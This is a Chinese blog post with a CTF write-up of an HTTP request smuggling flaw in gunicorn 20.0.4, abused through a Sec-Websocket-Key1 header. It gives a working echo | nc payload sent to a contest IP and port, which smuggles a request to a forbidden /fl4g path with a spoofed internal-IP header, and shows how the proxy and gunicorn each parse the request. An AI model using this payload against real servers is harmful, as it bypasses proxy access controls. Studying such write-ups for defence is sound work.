gunicorn 20.0.4 请求走私漏洞

最新推荐文章于 2024-03-19 17:21:25 发布
最新推荐文章于 2024-03-19 17:21:25 发布
阅读量1.5k 收藏 2
点赞数
分类专栏: 刷题 文章标签: websocket 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61142406/article/details/124991920
版权

某比赛的一个题,不知道结束没有,就不说名字了
gunicorn <= 20.0.4,无论在gunicorn 前使用哪个代理,该漏洞都有效, Http头中的

Sec-Websocket-Key: 1

会进行特殊解析,从而引发此漏洞

/fl4g禁止访问

payload:
echo -en "GET / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 90\r\nSec-Websocket-Key1: x\r\n\r\nxxxxxxxxGET /fl4g HTTP/1.1\r\nHost: localhost\r\nsecr3t_ip:127.0.0.1\r\nContent-Length: 55\r\n\r\nGET / HTTP/1.1\r\nHost: 127.0.0.1:80\r\n\r\n" | nc 59.110.159.206 7020

漏洞关键点:

在文件
/gunicorn/http/message.py
中有一个
set_body_reader
函数,它根据请求头确定请求正文的大小。 如果传入的请求头中包含
Sec-Websocket-Key: 1
则假定该请求的内容长度为 8(Content-Length字段会被忽略)

发送的Poc长这样

GET / HTTP/1.1
\r\nHost: localhost\r\n
Content-Length: 90\r\n
Sec-Websocket-Key1: x\r\n
\r\n
xxxxxxxxGET /fl4g HTTP/1.1\r\n
Host: localhost\r\n
secr3t_ip:127.0.0.1\r\n
Content-Length: 55\r\n
\r\n
GET / HTTP/1.1\r\n
Host: 127.0.0.1:80\r\n
\r\n


proxy 看到的是这个请求


GET / HTTP/1.1
\r\nHost: localhost\r\n
Content-Length: 90\r\n
Sec-Websocket-Key1: x\r\n
\r\n
xxxxxxxxGET /fl4g HTTP/1.1\r\n
Host: localhost\r\n
secr3t_ip:127.0.0.1\r\n
Content-Length: 55\r\n
\r\n
GET / HTTP/1.1\r\n
Host: 127.0.0.1:80\r\n
\r\n

gunicorn看到的则是这两个请求

GET / HTTP/1.1
\r\nHost: localhost\r\n
Content-Length: 90\r\n
Sec-Websocket-Key1: x\r\n
\r\n
xxxxxxxx
和
GET /fl4g HTTP/1.1\r\n
Host: localhost\r\n
secr3t_ip:127.0.0.1\r\n
Content-Length: 55\r\n
\r\n
GET / HTTP/1.1\r\n
Host: 127.0.0.1:80\r\n
\r\n
I·CE
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
supervisor + gunicorn 的坑
happy42779的博客
12-03 1408
在尝试使用supervisor 来守护 gunicorn启动的web服务时,遇到了一个小坑,但是这个小坑却耽误了不少时间! 建议: 安装有3中方式: 1.系统安装,这样安装的是系统全局的,系统会使用python2来运行,所以弃用这个方式。 2. 全局pip, 使用pip3 install supervisor 可以安装,但是安装后需要进入到很深的全局包的目录才能运行,如 /usr/loca...
【WEB】gunicorn走私漏洞
HWHXY的博客
12-16 1181
但其他的代理服务器则会认为是一个请求,因为没有Sec-Websocket-Key1的逻辑。这里需要自己计算不同的content-length在不同的proxy中的请求体内容。例如前端haproxy拒绝访问POST请求,但是gunicorn可以访问。那么借此就可以绕过gunicorn之外的一些服务器的限制。那么就将content_length强制赋值为8。burp开启自动更新则可以计算body的大小。gunicorn会认为上述请求是两个请求。关闭则可以自己repeat poc。则可以利用上述POC构造。
gunicorn版本bug造成flask请求无法接受请求参数
u012132349的博客
03-25 1013
一般地,生产环境只能用gunicorn命令启动python服务,如果在模拟请求方访问服务时发现服务端始终接收不到请求传入的业务参数。 那么有可能是gunicorn版本较低的原因,我当时的版本是19.X,升级至20.0.4版本即可(其他版本待测)。 ...
HTTP 请求走私
Sentiment的博客
05-05 1594
HTTP 请求走私是一种用于干扰网站处理从一个或多个用户接收的 HTTP 请求序列的方式的技术。请求走私漏洞通常本质上至关重要,允许攻击者绕过安全控制,未经授权访问敏感数据,并直接危害其他应用程序用户。 漏洞成因 HTTP规范提供了两种不同的方法来指定请求的结束位置:Content-Length标头和Transfer-Encoding标头,若同一请求前端与后端所使用的规范不同就可能导致解析差异,从而造成请求走私。一般服务器有三种解析方式: CL.TE:前端服务器使用Conten
使用supervisor实现thinkphp-queue进程常驻后台·
光九的博客
09-08 1212
1、Supervisor是用Python开发的一套通用的进程管理程序,能将一个普通的命令行进程变为后台daemon,并监控进程状态,异常退出时能自动重启。 2、详细的配置说明请参考https://www.jianshu.com/p/0b9054b33db3,下面主要说说我的配置过程。 yum安装supervisor yum install epel-release yum install supervisor //设置开机自动启动 systemctl enable supervisor...
Unicode漏洞
得峰的专栏 [网络收藏]
05-07 1348
  Unicode漏洞可以说是目前最热门的漏洞了,关于Unicode漏洞原理的文章有很多了,我们初学者没有必要搞清除那些,通过本篇《Unicode漏洞入侵图文讲解》,先来看看具体的使用。 一、准备工具   Rangsc
python3-gunicorn-20.0.4-1.el8.noarch.rpm
12-07
离线安装包,亲测可用
python-gunicorn-doc-20.0.4-1.el8.noarch.rpm
01-02
官方离线安装包,测试可用。使用rpm -ivh [rpm完整包名] 进行安装
机器学习后端部署 Nginx gunicorn flask.zip
最新发布
04-23
4. 接下来,安装Nginx,配置Nginx服务器以代理gunicorn。在Nginx配置文件中,设置一个server块,指定监听端口和代理到gunicorn的上游服务器。 5. 重启Nginx以应用新的配置。 6. 测试部署,通过访问Nginx监听的URL,...
python2-gunicorn-19.9.0-4.el7.noarch.rpm
12-30
官方离线安装包,测试可用。使用rpm -ivh [rpm完整包名] 进行安装
gunicorn安装包(用于pip安装)
01-31
gunicorn安装包(用于pip安装),可用python3;下载后在同目录下,运用 pip install gunicorn-19.9.0-py2.py3-none-any.whl
掌控安全腾龙杯2024(WEB方向)
Zue3r的博客
03-19 1983
掌控安全腾龙杯2024(WEB方向)
Python Web——Gunicorn 源码解析
sinat_28375239的博客
04-20 118
Python Web——Gunicorn 源码解析 https://www.jianshu.com/p/1e5feccb37d9
ISCC-2022
ki10Moc的博客
06-06 3816
pyccwp
HAProxy——http请求走私漏洞(CVE-2021-40346)分析
weixin_50464560的博客
09-24 3590
漏洞信息在9月7号,JFrog安全研究团队发布了一个HAProxy的严重漏洞的信息。HAProxy是一个使用C语言编写的自由及开放源代码软件,其提供高可用性、负载均衡,以及基于TCP和HTTP的应用程序代理。 HAProxy特别适用于那些负载特大的web站点,这些站点通常又需要会话保持或七层处理。HAProxy运行在当前的硬件上,完全可以支持数以万计的并发连接。并且它的运行模式使得它可以很简单安全的整合进架构中, 同时可以保护web服务器不被暴露到网络上。 此漏洞编号为CVE-2021-40346,是一个整
python pickle反序列化漏洞_渗透测试 - 黑客技术 | 【技术分享】记CTF比赛中发现的Python反序列化漏洞_吾爱漏洞...
weixin_39618121的博客
12-12 628
写在前面的话在前几天,我有幸参加了ToorConCTF(https://twitter.com/toorconctf),而在参加此次盛会的过程中我第一次在Python中发现了序列化漏洞。在我们的比赛过程中,有两个挑战中涉及到了能够接受序列化对象的Python库,而我们通过研究发现,这些Python库中存在的安全漏洞将有可能导致远程代码执行(RCE)。由于我发现网上关于这方面的参考资料非常散乱,查找...
JumpServer 远程代码执行漏洞
热门推荐
江左盟的博客
01-24 2万+
目录 简介 漏洞原理 影响版本 漏洞分析 漏洞利用 修复方法 Poc Exp 参考文章 简介 JumpServer 是全球首款开源的堡垒机,使用 GNU GPL v2.0 开源协议,是符合 4A 规范的运维安全审计系统。JumpServer 使用 Python / Django 为主进行开发,遵循 Web 2.0 规范,配备了业界领先的 Web Terminal 方案,交互界面美观、用户体验好。JumpServer 采纳分布式架构,支持多机房跨区域部署,支持横向扩展,无资产数量及并发限
JumpServer 未授权接口 远程命令执行漏洞
PeiQi的博客
01-19 4122
JumpServer 未授权接口 远程命令执行漏洞 漏洞描述 JumpServer 是全球首款完全开源的堡垒机, 使用GNU GPL v2.0 开源协议, 是符合4A 的专业运维审计系统。 JumpServer 使用Python / Django 进行开发。2021年1月15日,阿里云应急响应中心监控到开源堡垒机JumpServer发布更新,修复了一处远程命令执行漏洞。由于 JumpServer 某些接口未做授权限制,攻击者可构造恶意请求获取到日志文件获取敏感信息,或者执行相关API操作控制其中所有机器。
JumpServer 远程执行漏洞 2021-01-15
黄树茂博客
03-08 472
2021年1月15日 JumpServer 发现远程执行漏洞 非常感谢reactivity of Alibaba Hackerone bug bounty program(瑞典) 向我们报告了此 BUG 影响版本: < v2.6.2 < v2.5.4 < v2.4.5 = v1.5.9 >= v1.5.3 安全版本: >= v2.6.2 >= v2.5.4 >= v2.4.5 = v1.5.9 (版本号没变) < v1.5.3 修复方.
gunicorn启动报错gunicorn.errors.HaltServer
06-10
gunicorn.errors.HaltServer 是 Gunicorn 的一种异常,通常表示 Gunicorn 在启动或运行过程中遇到严重问题导致进程崩溃。常见的原因可能包括端口被占用、权限不足、配置文件错误等。 你可以尝试检查以下几个方面: 1. 确认端口是否被占用:可以使用 lsof 命令查看端口是否被占用。 2. 检查日志文件:查看 Gunicorn 的日志文件,以了解具体的错误信息。 3. 确认 Gunicorn 配置是否正确:检查 Gunicorn 配置文件是否正确,包括端口号、工作进程数、日志文件路径等。 4. 确认权限是否足够:Gunicorn 进程需要足够的权限才能启动,检查当前用户是否具有足够的权限。 如果以上方法都没有解决问题,你可以尝试升级 Gunicorn 版本或者重新安装 Gunicorn
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值